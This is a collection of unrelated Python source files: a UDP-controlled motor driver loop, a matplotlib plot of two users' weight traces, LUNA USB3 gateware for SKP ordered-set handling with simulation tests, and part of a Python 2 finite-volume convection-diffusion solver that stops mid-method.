HOST = "127.0.0.1" if "--local" in sys.argv else sys.argv[1]
PORT = 3000
buff_size = 128
last_recived = 0  # NOTE(review): never updated or read below -- dead variable (and typo)?
# One UDP packet = three signed bytes: steering, speed, button bits.
unpacker = struct.Struct("bbb")
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
    s.bind((HOST, PORT))
    s.setblocking(False)
    print(f"Bound to {HOST}:{PORT} and{' ' if DEBUG else ' not '}running in debug mode")
    while True:
        # Wait up to one second for a datagram.
        r, _, _ = select.select([s], [], [], 1.0)
        if not r:
            # Timed out: report the lost connection and keep polling.
            # NOTE(review): this `stop` is overwritten as soon as a packet arrives,
            # so the motors are NOT stopped on connection loss -- confirm intent.
            stop = True
            sys.stdout.write("\033[2K\033[1G")  # clear line, cursor to column 1
            print("lost connection", end='\r')
            continue
        else:
            msg = s.recvfrom(buff_size)
            msg = msg[0]
            steering, speed, btns = unpacker.unpack(msg)
            # Button bits: bit 0 = turbo, bit 1 = emergency stop.
            turbo = btns & 1
            stop = (btns & 2) >> 1
        if stop:
            # Emergency stop: zero all commands before driving the outputs.
            speed = 0
            turbo = 0
            steering = 0
        if DEBUG:
            # No hardware available: just echo the decoded command and loop.
            sys.stdout.write("\033[2K\033[1G")
            print(f"DEBUGING: {speed:03}, {steering:03}, {turbo}, {stop}", end="\r")
            continue
        # Positive speed drives forward, negative backward, zero releases both pins.
        if speed > 0:
            driver.set_fast(turbo)
            driver.set_value(driver.SPEED_PIN_FORWARD, speed)
        elif speed == 0:
            driver.set_value(driver.SPEED_PIN_FORWARD, 0)
            driver.set_value(driver.SPEED_PIN_BACKWARD, 0)
        else:
            driver.set_fast(0)
            driver.set_value(driver.SPEED_PIN_BACKWARD, -speed)
        # Positive steering turns right, negative left, zero centres both pins.
        if steering > 0:
            driver.set_value(driver.STEER_PIN_RIGHT, steering)
        elif steering == 0:
            driver.set_value(driver.STEER_PIN_LEFT, 0)
            driver.set_value(driver.STEER_PIN_RIGHT, 0)
        else:
            driver.set_value(driver.STEER_PIN_LEFT, -steering)
        sys.stdout.write("\033[2K\033[1G")
        print(f"{speed:03}, {steering:03}, {turbo}, {stop}", end="\r")
|
__author__ = 'Justin'
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from numpy import mean
# Print Justin and Pablo's User Weights
# Pablo's per-iteration weight trace.
weights = [0.55, 0.5, 0.55, 0.6000000000000001, 0.55, 0.55, 0.5, 0.45, 0.4, 0.4, 0.45, 0.45, 0.45, 0.5, 0.5, 0.45, 0.45, 0.5, 0.55, 0.55, 0.5, 0.55, 0.5, 0.5, 0.45, 0.45, 0.4, 0.4, 0.45, 0.5, 0.5, 0.5, 0.55, 0.55]
plt.plot(range(1,len(weights)+1,1),weights)
plt.xlabel('Iteration')
plt.ylabel('Zen Weight')
# Average after a 5-iteration burn-in.
# NOTE(review): the [5:-1] slice also drops the final sample -- confirm that is intended.
pablo_avg = mean(weights[5:-1])
# Justin's per-iteration weight trace (variable is reused; Pablo's list is no longer needed).
weights = [0.55, 0.55, 0.6000000000000001, 0.55, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.6000000000000001, 0.6500000000000001, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6500000000000001, 0.7000000000000002, 0.6500000000000001, 0.6000000000000001, 0.6000000000000001, 0.6500000000000001]
plt.plot(range(1,len(weights)+1,1),weights)
plt.xlabel('Iteration')
plt.ylabel('Zen Weight')
plt.title("Weight Regression")
justin_avg = mean(weights[5:-1])
# Legend patches.
# NOTE(review): colors assume matplotlib's default cycle (blue, green) matches the
# two plotted lines -- verify with the active style.
pablo_patch = mpatches.Patch(color='blue', label="Pablo")
justin_patch = mpatches.Patch(color='green', label='Justin')
plt.legend(handles = [pablo_patch,justin_patch])
# Dashed grey horizontal lines marking each player's post-burn-in average.
plt.plot(range(1,len(weights)+1,1),[pablo_avg for x in range(1,len(weights)+1,1)],'--',color='#737373')
plt.plot(range(1,len(weights)+1,1),[justin_avg for x in range(1,len(weights)+1,1)],'--',color='#737373')
plt.show()
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# Copyright (c) 2020 Florent Kermarrec <florent@enjoy-digital.fr>
#
# Code adapted from ``usb3_pipe``.
# SPDX-License-Identifier: BSD-3-Clause
""" Code for handling SKP ordered sets on the transmit and receive path.
SKP ordered sets are provided in order to give some "padding data" that can be removed
in order to handle differences in transmitter/receiver clock rates -- a process called
"clock tolerance compensation" (CTC). The actual insertion and removal of SKP ordered sets
for CTC is handled by the PHY -- but it only adds and removes sets where it needs to in order to
compensate for clock differences.
It's up to us to insert and remove additional ordered sets.
"""
import unittest
from amaranth import *
from .coding import SKP, stream_word_matches_symbol
from ...stream import USBRawSuperSpeedStream
from ....test.utils import LunaSSGatewareTestCase, ss_domain_test_case
class CTCSkipRemover(Elaboratable):
    """ Clock Tolerance Compensation (CTC) receive buffer gateware.
    It's functionally impossible to precisely synchronize the clocks for two independent
    systems -- every specification has to allow for some difference in frequency between
    the system's clocks (the "clock tolerance")
    To compensate, high speed serial protocols inject 'filler' bytes called "SKP ordered sets",
    which can be safely discarded. This allows the slower clock to catch up to the faster one.
    [USB 3.2r1: 6.4.3].
    Our PHY handles the core clock tolerance compensation inside of its own clock domain; removing
    these filler sets whenever removing them helps to keep the receiver and transmitter's clocks in sync.
    This leaves behind the sets whose removal would not directly help with CTC.
    This module removes those leftovers before data leaves the physical layer.
    Attributes
    ----------
    sink: USBRawSuperSpeedStream(), input stream
        The stream from which SKP ordered sets should be removed.
    source: USBRawSuperSpeedStream(), output stream
        The relevant stream with SKP ordered sets removed. Note that past this point,
        ``stream.valid`` can and will sometimes be false.
    skip_removed: Signal(), output
        Strobe that indicates that a SKP ordered set was removed.
    """
    def __init__(self):
        #
        # I/O port
        #
        self.sink = USBRawSuperSpeedStream()
        self.source = USBRawSuperSpeedStream()
        self.skip_removed = Signal()
        # Diagnostic output mirroring the internal elastic-buffer fill level.
        # NOTE(review): the internal counter ranges up to 2 * len(sink.ctrl), but this
        # signal only ranges up to len(sink.ctrl) + 1 values -- high fill levels may
        # truncate; confirm intended width.
        self.bytes_in_buffer = Signal(range(len(self.sink.ctrl) + 1))
    def elaborate(self, platform):
        m = Module()
        sink = self.sink
        source = self.source
        # Bytes per stream word; one ctrl (K-symbol) bit per data byte.
        bytes_in_stream = len(sink.ctrl)
        #
        # Find SKP symbols
        #
        # Identify the locations of any SKP symbols present in the stream.
        skp_locations = Signal(bytes_in_stream)
        for i in range(bytes_in_stream):
            m.d.comb += skp_locations[i].eq(stream_word_matches_symbol(sink, i, symbol=SKP))
        # If we've found one, indicate that we're removing it.
        skip_found = self.sink.valid & self.sink.ready & (skp_locations != 0)
        m.d.comb += self.skip_removed.eq(skip_found)
        #
        # Data Extractor
        #
        # We'll first extract the data and control bits for every position that doesn't contain a SKP.
        valid_data = Signal.like(sink.data)
        valid_ctrl = Signal.like(sink.ctrl)
        valid_byte_count = Signal(range(0, bytes_in_stream + 1))
        # We have a SKIP location for each byte; and each locations has two possible values
        # (SKP, no SKP); and therefore we have 2 ** <bytes> distinct arrangements.
        possible_arrangement_count = 2 ** bytes_in_stream
        possible_arrangements = range(possible_arrangement_count)
        # We'll handle each possibility with a programmatically generated case.
        with m.Switch(skp_locations):
            # We'll generate a single case for each possible "skip mask".
            for skip_mask in possible_arrangements:
                with m.Case(skip_mask):
                    data_fragments = []
                    ctrl_fragments = []
                    # We'll iterate over each of our possible positions, and gather
                    # the Amaranth signals associated with the non-skip values in the
                    # relevant position.
                    for position in range(bytes_in_stream):
                        # If this case would have a valid byte at the given position, grab it.
                        position_mask = 1 << position
                        if (position_mask & skip_mask) == 0:
                            data_signal_at_position = sink.data.word_select(position, 8)
                            ctrl_signal_at_position = sink.ctrl[position]
                            data_fragments.append(data_signal_at_position)
                            ctrl_fragments.append(ctrl_signal_at_position)
                    # If there are any valid data signals associated with the given position,
                    # coalesce the data and control signals into a single word, which we'll handle below.
                    if data_fragments:
                        m.d.comb += [
                            valid_data.eq(Cat(*data_fragments)),
                            valid_ctrl.eq(Cat(*ctrl_fragments)),
                            valid_byte_count.eq(len(data_fragments)),
                        ]
        #
        # Elastic Buffer / Valid Data Coalescence
        #
        # We now have a signal that contains up to a valid word of data. We'll need to
        # stitch this data together before we can use it. To do so, we'll use a shift
        # register long enough to store two complete words of data -- one for the word
        # we're outputting, and one for a word-in-progress.
        # This shift register serves as a local "elastic buffer" -- we can add in data in
        # bits and pieces, and remove it in bits and pieces.
        buffer_size_bytes = bytes_in_stream * 2
        # Create our internal shift register, as well as our current fill counter.
        data_buffer = Signal(buffer_size_bytes * 8)
        ctrl_buffer = Signal(buffer_size_bytes)
        bytes_in_buffer = Signal(range(0, buffer_size_bytes + 1))
        # Determine if we'll have a valid stream
        # (accept input while the buffer is not overfull).
        m.d.comb += sink.ready.eq(bytes_in_buffer <= buffer_size_bytes)
        # If we're receiving data this round, add it into our shift register.
        with m.If(sink.valid & sink.ready):
            # Compute how many bytes we'll have next cycle: it's the number of bytes we already have
            # (bytes_in_buffer) plus the bytes we're adding (valid_byte_count) and minus the data we're
            # about to remove (one word, or bytes_in_stream) if we're reading, or minus nothing if we're not.
            with m.If(source.valid & source.ready):
                m.d.ss += bytes_in_buffer.eq(bytes_in_buffer + valid_byte_count - bytes_in_stream)
            with m.Else():
                m.d.ss += bytes_in_buffer.eq(bytes_in_buffer + valid_byte_count)
            # Handle our shift register pushing logic.
            with m.Switch(valid_byte_count):
                # Our simplest case: we have no data in the buffer; and nothing needs to change.
                with m.Case(0):
                    pass
                # In every other case, we have some data to be added to the buffer.
                # We'll do the math slightly differently for each potential number of bytes.
                for i in range(1, bytes_in_stream + 1):
                    with m.Case(i):
                        # Grab our existing data, and stick it onto the end of the shift register.
                        m.d.ss += [
                            data_buffer .eq(Cat(data_buffer[8*i:], valid_data[0:8*i])),
                            ctrl_buffer .eq(Cat(ctrl_buffer[1*i:], valid_ctrl[0:1*i])),
                        ]
        # If we're not receiving data, but we -are- removing it, we'll just update our total
        # valid data counter to account for the removal.
        with m.Elif(source.valid & source.ready):
            m.d.ss += bytes_in_buffer.eq(bytes_in_buffer - bytes_in_stream)
        #
        # Data output
        #
        # We'll output a word each time we have enough data in our shift register to
        # output a full word.
        m.d.comb += source.valid.eq(bytes_in_buffer >= bytes_in_stream)
        # Our data ends in different places depending on how many bytes we
        # have in our shift register; so we'll need to pop it from different locations.
        with m.Switch(bytes_in_buffer):
            for i in range(bytes_in_stream, bytes_in_stream * 2):
                with m.Case(i):
                    # Grab the relevant word from the end of the buffer.
                    # NOTE(review): the literal 8 here equals buffer_size_bytes only when
                    # bytes_in_stream == 4; `buffer_size_bytes - i` would generalize -- confirm.
                    word_position = 8 - i
                    m.d.comb += [
                        source.data.eq(data_buffer[8 * word_position : 8 * (word_position + bytes_in_stream)]),
                        source.ctrl.eq(ctrl_buffer[1 * word_position : 1 * (word_position + bytes_in_stream)]),
                    ]
        #
        # Diagnostic output.
        #
        m.d.comb += self.bytes_in_buffer.eq(bytes_in_buffer)
        return m
class CTCSkipRemoverTest(LunaSSGatewareTestCase):
    """ Simulation tests for :class:`CTCSkipRemover`.
    Each test drives 32-bit words (with per-byte ctrl flags marking SKP symbols, 0x3C)
    into the DUT and checks that the output stream contains the same bytes with the
    SKPs squeezed out.
    """
    FRAGMENT_UNDER_TEST = CTCSkipRemover
    def initialize_signals(self):
        # Set up our streams to always ferry data in and out, where possible.
        yield self.dut.sink.valid.eq(1)
        yield self.dut.source.ready.eq(1)
    def provide_input(self, data, ctrl):
        # Drive one word of (data, ctrl) into the DUT, then advance one cycle.
        yield self.dut.sink.data.eq(data)
        yield self.dut.sink.ctrl.eq(ctrl)
        yield
    @ss_domain_test_case
    def test_dual_skip_removal(self):
        # Two adjacent SKPs in the low bytes of one word.
        source = self.dut.source
        # When we add data into the buffer...
        yield from self.provide_input(0xAABBCCDD, 0b0000)
        # ... we should see our line go valid only after four bytes are collected.
        self.assertEqual((yield source.valid), 0)
        yield from self.provide_input(0x71BA3C3C, 0b0011)
        # Once it does go high, it should be accompanied by valid input data.
        self.assertEqual((yield source.valid), 1)
        self.assertEqual((yield source.data), 0xAABBCCDD)
        self.assertEqual((yield source.ctrl), 0)
        yield from self.provide_input(0x11223344, 0b1100)
        # If data with SKPs were provided, our output should be invalid, until we
        # receive enough bytes to have four non-skip bytes.
        self.assertEqual((yield source.valid), 0)
        # Once we do, we should see a copy of our data without the SKPs included.
        yield
        self.assertEqual((yield source.data), 0x334471BA)
        self.assertEqual((yield source.ctrl), 0)
        yield
        self.assertEqual((yield source.data), 0x33441122)
        self.assertEqual((yield source.ctrl), 0b11)
    @ss_domain_test_case
    def test_shifted_dual_skip_removal(self):
        # Two SKPs in the middle bytes of a word.
        source = self.dut.source
        # When we add data into the buffer...
        yield from self.provide_input(0xAABBCCDD, 0b0000)
        # ... we should see our line go valid only after four bytes are collected.
        self.assertEqual((yield source.valid), 0)
        yield from self.provide_input(0x713C3CBA, 0b0110)
        # Once it does go high, it should be accompanied by valid input data.
        self.assertEqual((yield source.valid), 1)
        self.assertEqual((yield source.data), 0xAABBCCDD)
        self.assertEqual((yield source.ctrl), 0)
        yield from self.provide_input(0x113C3C44, 0b0110)
        # If data with SKPs were provided, our output should be invalid, until we
        # receive enough bytes to have four non-skip bytes.
        self.assertEqual((yield source.valid), 0)
        # Once we do, we should see a copy of our data without the SKPs included.
        yield from self.provide_input(0x55667788, 0b0000)
        self.assertEqual((yield source.data), 0x114471BA)
        self.assertEqual((yield source.ctrl), 0)
        yield
        self.assertEqual((yield source.data), 0x55667788)
        self.assertEqual((yield source.ctrl), 0)
    @ss_domain_test_case
    def test_single_skip_removal(self):
        # A lone SKP in the top byte of a word.
        source = self.dut.source
        # When we add data into the buffer...
        yield from self.provide_input(0xAABBCCDD, 0b0000)
        # ... we should see our line go valid only after four bytes are collected.
        self.assertEqual((yield source.valid), 0)
        yield from self.provide_input(0x3C556677, 0b1000)
        # Once it does go high, it should be accompanied by valid input data.
        self.assertEqual((yield source.valid), 1)
        self.assertEqual((yield source.data), 0xAABBCCDD)
        self.assertEqual((yield source.ctrl), 0)
        yield from self.provide_input(0x11223344, 0b1100)
        # If data with SKPs were provided, our output should be invalid, until we
        # receive enough bytes to have four non-skip bytes.
        self.assertEqual((yield source.valid), 0)
        # Once we do, we should see a copy of our data without the SKPs included.
        yield
        self.assertEqual((yield source.data), 0x44556677)
        self.assertEqual((yield source.ctrl), 0)
        yield
        self.assertEqual((yield source.data), 0x44112233)
        self.assertEqual((yield source.ctrl), 0b110)
    @ss_domain_test_case
    def test_cycle_spread_skip_removal(self):
        # SKPs arriving in different bytes on different cycles.
        source = self.dut.source
        # When we add data into the buffer...
        yield from self.provide_input(0xAABBCCDD, 0b0000)
        # ... we should see our line go valid only after four bytes are collected.
        self.assertEqual((yield source.valid), 0)
        yield from self.provide_input(0x3C556677, 0b1000)
        # Once it does go high, it should be accompanied by valid input data.
        self.assertEqual((yield source.valid), 1)
        self.assertEqual((yield source.data), 0xAABBCCDD)
        self.assertEqual((yield source.ctrl), 0)
        yield from self.provide_input(0x1122333C, 0b0001)
        # If data with SKPs were provided, our output should be invalid, until we
        # receive enough bytes to have four non-skip bytes.
        self.assertEqual((yield source.valid), 0)
        # Once we do, we should see a copy of our data without the SKPs included.
        yield from self.provide_input(0x44556677, 0b0000)
        self.assertEqual((yield source.data), 0x33556677)
        self.assertEqual((yield source.ctrl), 0)
        yield
        self.assertEqual((yield source.data), 0x66771122)
        self.assertEqual((yield source.ctrl), 0b0)
class CTCSkipInserter(Elaboratable):
    """ Clock Tolerance Compensation (CTC) Skip insertion gateware.
    See the ``CTCSkipRemover`` for a description of CTC and its general operation.
    Our PHY handles the core clock tolerance compensation inside of its own clock domain; adding
    Skip sets whenever adding them helps to keep the transmitter's elastic buffer from running low
    on data. However, we still need to add in our own Skip ordered sets so the other side of the link
    has enough to perform its own CTC adjustments.
    This module adds ordered sets, per the USB standard.
    Attributes
    ----------
    sink: USBRawSuperSpeedStream(), input stream
        The stream into which SKP ordered sets should be inserted.
    source: USBRawSuperSpeedStream(), output stream
        The relevant stream with SKP ordered sets inserted.
    can_send_skip: Signal(), input
        Controls when SKPs can be inserted. This should be asserted when we're transmitting
        logical idle.
    sending_skip: Signal(), output
        Indicates that we're currently sending only SKP characters; and thus our scrambler
        should not advance.
    """
    # One SKP ordered set is scheduled per this many transmitted bytes [USB3.0r1: 6.4.3].
    SKIP_BYTE_LIMIT = 354
    def __init__(self):
        #
        # I/O port
        #
        self.sink = USBRawSuperSpeedStream()
        self.source = USBRawSuperSpeedStream()
        self.can_send_skip = Signal()
        self.sending_skip = Signal()
    def elaborate(self, platform):
        m = Module()
        sink = self.sink
        source = self.source
        #
        # SKP scheduling.
        #
        # The largest amount of pending SKP ordered sets can right before finishing transmitting:
        # (20 bytes of DPH) + (1036 bytes of DPP) + (6 bytes of SKP)
        # This sequence is 1062, or 354*3, bytes long. Since we only transmit pairs of SKP ordered sets,
        # the maximum amount of pending SKP ordered sets at any time is 4.
        skips_to_send = Signal(range(5))
        skip_needed = Signal()
        # Precisely count the amount of skip ordered sets that will be inserted at the next opportunity.
        # From [USB3.0r1: 6.4.3]: "The non-integer remainder of the Y/354 SKP calculation shall not be
        # discarded and shall be used in the calculation to schedule the next SKP Ordered Set."
        # Pending count: +1 when a set becomes due, -2 when a pair is sent (net -1 if
        # one becomes due on the same cycle a pair is sent).
        with m.If(skip_needed & ~self.sending_skip):
            m.d.ss += skips_to_send.eq(skips_to_send + 1)
        with m.If(~skip_needed & self.sending_skip):
            m.d.ss += skips_to_send.eq(skips_to_send - 2)
        with m.If(skip_needed & self.sending_skip):
            m.d.ss += skips_to_send.eq(skips_to_send - 1)
        #
        # SKP insertion timing.
        #
        bytes_per_word = len(self.sink.ctrl)
        data_bytes_elapsed = Signal(range(self.SKIP_BYTE_LIMIT))
        # Count each byte of data we send...
        with m.If(sink.valid & sink.ready):
            m.d.ss += data_bytes_elapsed.eq(data_bytes_elapsed + bytes_per_word)
            # ... and once we see enough data, schedule insertion of a skip ordered set,
            # carrying the remainder over into the next count.
            with m.If(data_bytes_elapsed + bytes_per_word >= self.SKIP_BYTE_LIMIT):
                m.d.ss += data_bytes_elapsed.eq(data_bytes_elapsed + bytes_per_word - self.SKIP_BYTE_LIMIT)
                m.d.comb += skip_needed.eq(1)
        #
        # SKP insertion.
        #
        # Finally, if we can send a skip this cycle and need to, replace our IDLE with two SKP ordered sets.
        #
        # Although [USB3.0r1: 6.4.3] allows "during training only [...] the option of waiting to insert 2 SKP
        # ordered sets when the integer result of Y/354 reaches 2", inserting individual SKP ordered sets on
        # a 32-bit data path has considerable overhead, and we only insert pairs.
        with m.If(self.can_send_skip & (skips_to_send >= 2)):
            m.d.comb += self.sending_skip.eq(1)
            m.d.ss += [
                source.valid .eq(1),
                source.data  .eq(Repl(SKP.value_const(), len(source.ctrl))),
                source.ctrl  .eq(Repl(SKP.ctrl_const(), len(source.ctrl))),
            ]
        with m.Else():
            # No insertion this cycle: pass the sink stream through unchanged.
            m.d.ss += [
                self.source .stream_eq(self.sink),
            ]
        return m
# Run the CTC skip-handling unit tests when this module is executed directly.
if __name__ == "__main__":
    unittest.main()
|
'''
Created on Feb 6, 2012
@author: bogdan hlevca 995151213
'''
#import numerical Python for Matrix operations
import numpy
import SIMPLE
import linalg
#import the TDMA module
from thomas import *
#import the graphi library
import matplotlib.pyplot as plt
# Create a mesh class that holds a vector of nodes
#Class definition
class FinVol_2D_Conv_Diff(object):
'''
Solve the equation:
d/dx(rho*u*Fi) + d/dy(ro*v*Fi) = d/dx(Gamma* dFi/dx)+d/dy(Gamma* dFi/dy)
where
d is the partial derivative operator (the "round d", \u2202)
F - stands for the property Fi
'''
@classmethod
def plot3curves(cls, FiCD, FiUD, FiQU):
    '''
    Plots comparative values on the diagonal of the square
    Parameters
    ----------
    FiCD: diagonal Fi values from the Central Differences scheme (numpy array)
    FiUD: diagonal Fi values from the Upwind Differences scheme (numpy array)
    FiQU: diagonal Fi values from the QUICK scheme (numpy array)
    '''
    fig = plt.figure(1, facecolor = 'w', edgecolor = 'k') #prepare the plotting environment
    ax = fig.add_subplot(111)
    #create the figure and axes object
    # Creating the grid of coordinates x,y
    x = range(0, FiCD.size) #create the x, and y divisions
    #draw only the contours
    cs = ax.plot(x, FiCD, x, FiUD, x, FiQU) # plot all three diagonal curves on one axes
    ax.legend(('Central Differences', 'Upwind Differences', 'QUICK'))
    plt.show()
#end plot3curves
#constructor object initializes the class arrays and calculates preliminary coefficients
def __init__(self, var, FiBound, p, simple):
    '''
    Constructor
    Parameters
    ----------
    var: which velocity component this solver handles ("u" or "v")
    FiBound: boundary values of Fi indexed by face (W, E, N, S)
    p: pressure field
    simple: owning SIMPLE driver supplying grid, fluid and scheme settings
    '''
    self.debug = simple.debug
    self.simple = simple
    self.var = var
    # Face indices used to address the per-face arrays below.
    self.W = 0
    self.E = 1
    self.N = 2
    self.S = 3
    self.urf = 0.7 #underrelaxation factor
    # Per-face diffusion coefficient, face area, and diffusion conductance.
    self.Gamma = numpy.zeros(4)
    self.A = numpy.zeros(4)
    self.Df = numpy.zeros(4)
    self.deltaX = None
    self.deltaY = None
    #iterative error accepted
    self.EPSILON = 1e-7
    self.maxiter = 10000
    # Boundary values of Fi on each face.
    self.Fi0E = FiBound[self.E]
    self.Fi0N = FiBound[self.N]
    self.Fi0W = FiBound[self.W]
    self.Fi0S = FiBound[self.S]
    # Domain extents and grid resolution, copied from the SIMPLE driver.
    self.Lx = simple.Lx
    self.Ly = simple.Ly
    self.Nx = simple.Nx
    self.Ny = simple.Ny
    self.p = p
    self.rho = simple.rho
    self.scheme = simple.scheme
    self.initNodes() #initialize node coefficients
    self.calculateGamma(simple.Gx, simple.Gy) #calculate preliminary information, Gamma, deltaX and Y and the control volume area
    self.calculateDelta()
    self.calculateA()
    # convection terms are provided from outside by simple
    # self.calculate_F()
    self.calculate_Df()
    # Optional C++ BLAS acceleration for the linear algebra.
    if self.simple.lc.CPP == True:
        self.cls = linalg.CppBlas()
#end __init__
def initNodes(self):
    '''
    initialize node coefficients and TDMA coefficients
    Allocates all per-node coefficient arrays (Ny x Nx), seeds the solution
    field Fi from the previous SIMPLE iterate, and allocates the TDMA work vectors.
    '''
    #init the nodes
    #must have their own coefficients as they differ for various variables
    self.aW = numpy.zeros((self.Ny, self.Nx))
    self.aE = numpy.zeros((self.Ny, self.Nx))
    self.aN = numpy.zeros((self.Ny, self.Nx))
    self.aS = numpy.zeros((self.Ny, self.Nx))
    self.aP = numpy.zeros((self.Ny, self.Nx))
    # Second-neighbour coefficients (used by the QUICK scheme).
    self.aWW = numpy.zeros((self.Ny, self.Nx))
    self.aEE = numpy.zeros((self.Ny, self.Nx))
    self.aNN = numpy.zeros((self.Ny, self.Nx))
    self.aSS = numpy.zeros((self.Ny, self.Nx))
    #init Su sources
    self.SuN = numpy.zeros((self.Ny, self.Nx))
    self.SuS = numpy.zeros((self.Ny, self.Nx))
    self.SuE = numpy.zeros((self.Ny, self.Nx))
    self.SuW = numpy.zeros((self.Ny, self.Nx))
    #init Sp sources
    self.SpN = numpy.zeros((self.Ny, self.Nx))
    self.SpS = numpy.zeros((self.Ny, self.Nx))
    self.SpE = numpy.zeros((self.Ny, self.Nx))
    self.SpW = numpy.zeros((self.Ny, self.Nx))
    #init with zero the solution matrix
    self.Fi = numpy.zeros((self.Ny, self.Nx))
    self.FiOld = numpy.zeros((self.Ny, self.Nx))
    #initialize with values from previous run if any
    if self.var == "u":
        self.Fi = self.simple.ustar.copy()
    elif self.var == "v":
        self.Fi = self.simple.vstar.copy()
    else:
        print "Wrong variable passed"
        raise NameError("Wrong variable passed")
    #set the old values as current
    self.FiOld = self.Fi.copy()
    #convection terms
    self.F = self.simple.F
    self.FOld = self.simple.FOld
    #the TDMA coeficients. (We calculate vertical lines (columns = > allocate the number of horizontal lines)
    self.alp = numpy.zeros(self.Ny)
    self.bet = numpy.zeros(self.Ny)
    self.D = numpy.zeros(self.Ny)
    self.C = numpy.zeros(self.Ny)
def calculateGamma(self, GammaX, GammaY):
    '''
    Store the diffusion coefficient Gamma for each of the four cell faces.
    '''
    # NOTE(review): W/E faces receive GammaY while N/S faces receive GammaX --
    # confirm this pairing is intended rather than swapped.
    for face in (self.W, self.E):
        self.Gamma[face] = GammaY
    for face in (self.N, self.S):
        self.Gamma[face] = GammaX
def calculateA(self):
    '''
    Compute the control-volume face areas; a one-column grid degenerates to unit areas.
    '''
    if self.Nx == 1:
        # 1D case: every face gets a unit area.
        for face in (self.W, self.E, self.N, self.S):
            self.A[face] = 1
    else:
        # 2D case: W/E faces span deltaY, N/S faces span deltaX.
        for face in (self.W, self.E):
            self.A[face] = self.deltaY
        for face in (self.N, self.S):
            self.A[face] = self.deltaX
def calculateDelta(self):
    '''
    calculate preliminary information, deltaX and Y
    (uniform grid spacing in each direction)
    '''
    # NOTE(review): this file is Python 2 -- if Lx/Nx are both ints this is
    # floor division; confirm the domain sizes are floats.
    self.deltaX = self.Lx / self.Nx
    self.deltaY = self.Ly / self.Ny
def calculate_F(self):
    '''unsteady flow F is NOT constant
    Delegates recomputation of the convective fluxes to the SIMPLE driver.
    '''
    self.simple.calculate_F()
#end Calculate_F
def calculate_Df(self):
    '''
    Compute the face diffusion conductances D = Gamma * A / delta for the
    four faces of the control volume, then the boundary-link conductances
    D0{W,E,S,N} used by the source-term routines.
    '''
    self.Df[self.W] = self.Gamma[self.W] * self.A[self.W] / self.deltaX
    self.Df[self.E] = self.Gamma[self.E] * self.A[self.E] / self.deltaX
    self.Df[self.S] = self.Gamma[self.S] * self.A[self.S] / self.deltaY
    self.Df[self.N] = self.Gamma[self.N] * self.A[self.N] / self.deltaY
    print "***********************"
    print "Df on boundary set to 0"
    print "***********************"
    if self.scheme == "QUICK":
        #QUICK uses the plain face conductance at the boundary
        self.D0W = self.Df[self.W]
        self.D0E = self.Df[self.E]
        self.D0S = self.Df[self.S]
        self.D0N = self.Df[self.N]
    else:
        #NOTE(review): the factor 2 presumably accounts for the half grid
        #spacing between the boundary and the first cell centre -- confirm
        self.D0W = 2 * self.Df[self.W]
        self.D0E = 2 * self.Df[self.E]
        self.D0S = 2 * self.Df[self.S]
        self.D0N = 2 * self.Df[self.N]
#end calculate_D
def calculate_alpha(self, j, i):
    '''
    Set the upwind indicator flags Alpha_{w,e,s,n} for cell (j, i): each
    flag is 1 when the convective flux F through that face is positive,
    0 otherwise.  Used by the QUICK coefficient assembly.
    '''
    self.Alpha_w = 1 if self.F[self.W, j, i] > 0 else 0
    self.Alpha_e = 1 if self.F[self.E, j, i] > 0 else 0
    self.Alpha_s = 1 if self.F[self.S, j, i] > 0 else 0
    self.Alpha_n = 1 if self.F[self.N, j, i] > 0 else 0
#end calculate_alpha
def setBoundaryConditions(self):
    '''
    Write the Dirichlet boundary values Fi0{W,E,N,S} into the boundary
    cells of the solution field Fi.

    Replaces the original O(Nx*Ny) double loop with whole-row/column
    slice assignments.  The assignment order (W, E, N, S) matches the
    original per-cell branch order, so corner cells end up with the same
    final value as before (e.g. south overwrites west at (0, 0)).
    '''
    self.Fi[:, 0] = self.Fi0W            #west column
    self.Fi[:, self.Nx - 1] = self.Fi0E  #east column
    self.Fi[self.Ny - 1, :] = self.Fi0N  #north row
    self.Fi[0, :] = self.Fi0S            #south row
#end set BoundaryConditions
# set of functions to account for the cardinal values of the main feature Fi
def FiW(self, j, i):
    '''Fi at the western neighbour of cell (j, i); falls back to the west
    boundary value Fi0W on the west edge (i == 0).'''
    return self.Fi0W if i == 0 else self.Fi[j, i - 1]
def FiE(self, j, i):
    '''Fi at the eastern neighbour of cell (j, i); falls back to the east
    boundary value Fi0E on the east edge (i == Nx-1).'''
    return self.Fi0E if i == self.Nx - 1 else self.Fi[j, i + 1]
def FiS(self, j, i):
    '''Fi at the southern neighbour of cell (j, i); falls back to the south
    boundary value Fi0S on the south edge (j == 0).'''
    return self.Fi0S if j == 0 else self.Fi[j - 1, i]
def FiN(self, j, i):
    '''Fi at the northern neighbour of cell (j, i); falls back to the north
    boundary value Fi0N on the north edge (j == Ny-1).'''
    return self.Fi0N if j == self.Ny - 1 else self.Fi[j + 1, i]
def FiWW(self, j, i):
    '''
    Fi two cells to the west of (j, i), used by the QUICK stencil.
    Returns the boundary value Fi0W when the WW node is the boundary
    itself (i == 1) and 0 when it would fall outside the domain (i == 0);
    the matching aWW coefficient is zero there anyway.
    '''
    if i == 0:
        return 0
    if i == 1:
        return self.Fi0W
    return self.Fi[j, i - 2]
def FiEE(self, j, i):
    '''
    Fi two cells to the east of (j, i) (QUICK stencil).  Returns Fi0E when
    the EE node is the boundary (i == Nx-2) and 0 when it would fall
    outside the domain (i == Nx-1).
    '''
    if i == self.Nx - 1:
        return 0
    if i == self.Nx - 2:
        return self.Fi0E
    return self.Fi[j, i + 2]
def FiSS(self, j, i):
    '''
    Fi two cells to the south of (j, i) (QUICK stencil).  Returns Fi0S
    when the SS node is the boundary (j == 1) and 0 when it would fall
    outside the domain (j == 0).
    '''
    if j == 0:
        return 0
    if j == 1:
        return self.Fi0S
    return self.Fi[j - 2, i]
def FiNN(self, j, i):
    '''
